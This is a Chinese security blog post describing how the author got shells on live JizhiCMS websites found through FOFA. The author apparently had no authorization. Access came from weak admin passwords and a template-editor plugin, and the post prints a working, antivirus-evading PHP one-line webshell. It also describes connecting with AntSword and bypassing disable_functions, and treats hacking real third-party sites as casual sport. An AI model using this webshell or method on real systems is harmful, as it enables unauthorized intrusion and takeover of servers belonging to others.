记某CMS漏洞getshell

àì夳堔傛蜴生んèń 2023-01-18 09:26 398阅读 0赞

# 记极致CMS漏洞getshell #

> 今天下午比较空闲，就去搜索一些cms，突然对极致CMS感兴趣，而网上已经有一些文章对它进行分析利用，sql注入,xss,后台修改上传后缀名前台getshell等等。  
> 于是就引起了我的兴趣想去测试一下。

## 信息收集 ##

还是因为自己太懒，不想搭建环境，然后就想网上有好多网站啊，随便找一个去看看。hhh然后去利用`fofa`去搜索。（不能随便乱日）

## 弱密码yyds ##

搜索了一些网站，我们直接在url后面添加`/admin.php`,就直接跳到后台登录的地方。

![图片][992797a2ba32bf4d87a57d50fd13ccdc.png]

看到后台?!嗯~,测试了sql无果，想一想万一有弱密码呢?试一试也没有啥。

然后就测试了弱密码，你懂的。

然后成功登录~仿佛就看到了shell就在我面前了。

![图片][e2affc7f60be8c3c7404be490db5e6f4.png]

因为之前有师傅发过前台上传文件getshell了，那我这里就不进行测试了。直接寻找另一个方法getshell。

和平常的框架一样，登录后台之后就需要去测试功能点，然后我们就一个一个的去测试吧~(这里大概过了有40分钟 2333~）

唯一我感觉利用点就存在系统设置中的高级设置，我们可以选择上传的后缀名，不过这里是前台的上传啊，后台虽然有上传点但是一直绕过不了。难受死了，心里又不甘心在前台上传getshell，这岂不是很没有面子(傲娇)

![图片][853df96e671e128e0bb0235dcc1f96ba.png]

这里一直后台没有绕过~~~ 2333~

![图片][595ca125900a1d4c1223c7c6f6e6a7aa.png]

## 柳暗花明又一村 ##

想一想，如果要利用后台，那肯定是一些功能的问题，那我们就去认真找一下网站功能，找来找去就发现一个上传点，有点难受了。过了好久，突然想起了后台有一个`扩展管理`啊，应该说肯定可以下载一下插件来更加功能的吧。

![图片][086c923a6f3d4ff6c587f1c2a4ba398a.png]

然后就凭着感觉和功能去看看那些插件可以利用。发现了一个在线编辑模板的插件。

![图片][d1879fbce4e33f25a867eb2a98773b2f.png]

这里可能是ctfer的自觉吧~因为之前打过的ctf题基本上是可以利用编辑插件进行修改代码，就可以getshell。话不多说就开始尝试。先下载了该模块并进行安装。

安装前我们还是看看安装说明。万一错误了怎么办!

![图片][6d14b05bd5fb84e7dbe2ecdc0664ad5e.png]

意思就是我们安装的时候还需要设置密码，并且该目录权限比较高,`777`就让我看到了`shell`的希望

然后就设置密码登录密码。

![图片][ea322e50d50b745a071ea280b9459a84.png]

成功登录之后就看到了这个页面我当时直接嗨了起了（np！！！）

![图片][2c380029795f402fab85ff4fbca1e09a.png]

进入这个页面，那岂不是可以修改代码了，嘿嘿嘿~ 那不是shell唾手可得！

## 写shell连蚁剑 ##

测试了该插件的功能，发现只能修改代码还不能写文件，嗯~。那也简单啊，我们先在已存在的php页面上写入一句话，然后蚁剑连接，创建文件写shell,之后在删除之前修改的代码。

这里分享一个`免杀的小马`

<?php
    $a = $GLOBALS;
    $str = '_POST';
    eval/**nice**/(''. $a[$str]['cf87efe0c36a12aec113cd7982043573']. NULL);
    ?>

这里写入我们的一句话木马

![图片][e990066528f8affdc9b1d79068722600.png]

然后就是蚁剑去连接啦。看到蚁剑存在了一个绿色东西，长叹一口气~（不过如此）

连接成功居然不能执行？？？

![图片][70d1fdab3349266d27ab371429d4d56f.png]

心里又难受了一下~~~  
然后去看看到底过滤了那些函数。并且php版本是5.6

![图片][a609380b5ca9a297a16c9ded8f587a4c.png]

![图片][677f8f38f95997342cf5889756d346f8.png]

## 绕disable\_functions(没成功) ##

然后直接上蚁剑的插件，然后发现是5.6 并且是windows 呜呜呜 不会 直接告辞~

![图片][75db63b1df5d80a62f350030dfbdd2a2.png]

虽然没有成功执行命令，但也是一个getshell的思路。

啊~烦~。但是渗透人怎么能认输~

**俗话说得好，拿不下就换一个**（需要表哥们可以给一些意见学习一下~）

## 进行收集信息 ##

进行重复上面的操作又获得一个网站。并且还是通过弱口令获得~

**弱口令yyds**

## getshell执行命令 ##

这里的步骤和前面一样，因为有前面的步骤，而这个shell就简单多了。

也成功获得蚁剑连接。

![图片][ee104db8e464e3be6e4a8e6c46acae94.png]

并且还是不能执行命令，但是看到了linux系统就想，肯定比windows好多了啊。

![图片][3f1656224207046acfeccf1d3bcb4be1.png]

于是就开始绕disable\_functions，系统信息是这样的，那直接蚁剑一把梭。

![图片][76fd64559133e9eb0fb631fd8a5b7236.png]

成功绕过，这不就成功了!!!

![图片][3ff03761cd4370c3007d99791295e589.png]

爽歪歪~

## 总结 ##

*  极致CMS还是存在很多漏洞的。这里小弟只是抛砖引玉而已。
 *  而写到这里的时候已经是晚上了，提权的话还是后面文章在说吧。
 *  简单的说一下就是该漏洞是主要存在于cms后台插件的位置，允许用户修改代码，而这没有过滤就造成了巨大的风险。

[992797a2ba32bf4d87a57d50fd13ccdc.png]: /images/20221021/e6a8dc7c3dee43c1ac3544a89fd8c607.png
[e2affc7f60be8c3c7404be490db5e6f4.png]: /images/20221021/7e035ff920624e26908e19d0dff3c2dd.png
[853df96e671e128e0bb0235dcc1f96ba.png]: /images/20221021/fce2fcdadc3343aaa932baf298c42901.png
[595ca125900a1d4c1223c7c6f6e6a7aa.png]: /images/20221021/99f23c84cd344f44843698e7d40a289e.png
[086c923a6f3d4ff6c587f1c2a4ba398a.png]: /images/20221021/938bc703243a476fb25e2dbb8b7248da.png
[d1879fbce4e33f25a867eb2a98773b2f.png]: /images/20221021/15fe50f0d30d4c47a0d496ca544a0f32.png
[6d14b05bd5fb84e7dbe2ecdc0664ad5e.png]: /images/20221021/57f8e485d01d477c83186b8e5ca7bb48.png
[ea322e50d50b745a071ea280b9459a84.png]: /images/20221021/2f2a81e4d22642bda0467eae83434946.png
[2c380029795f402fab85ff4fbca1e09a.png]: /images/20221021/2ca8b55ef63e4af98bb13eb51acb3398.png
[e990066528f8affdc9b1d79068722600.png]: /images/20221021/01eccd7860514f9590aa4e645fcd9838.png
[70d1fdab3349266d27ab371429d4d56f.png]: /images/20221021/33f738ce92af44e1863525adee548724.png
[a609380b5ca9a297a16c9ded8f587a4c.png]: /images/20221021/80bfa3191d98470d861d176aa4ec0c4d.png
[677f8f38f95997342cf5889756d346f8.png]: /images/20221021/363bebac509f427b9cc18b84cd830ad2.png
[75db63b1df5d80a62f350030dfbdd2a2.png]: /images/20221021/b906831e1aeb4bbd9cc5b1837e1a3100.png
[ee104db8e464e3be6e4a8e6c46acae94.png]: /images/20221021/1dfb75fcf39f4cef9008060ce717e56b.png
[3f1656224207046acfeccf1d3bcb4be1.png]: /images/20221021/b8a61ae629ee4589be70e39d44fea044.png
[76fd64559133e9eb0fb631fd8a5b7236.png]: /images/20221021/47531af9ef2a4f859e5d9a90986b9921.png
[3ff03761cd4370c3007d99791295e589.png]: /images/20221021/0541dad590f4423a829133c5b3ed2f5b.png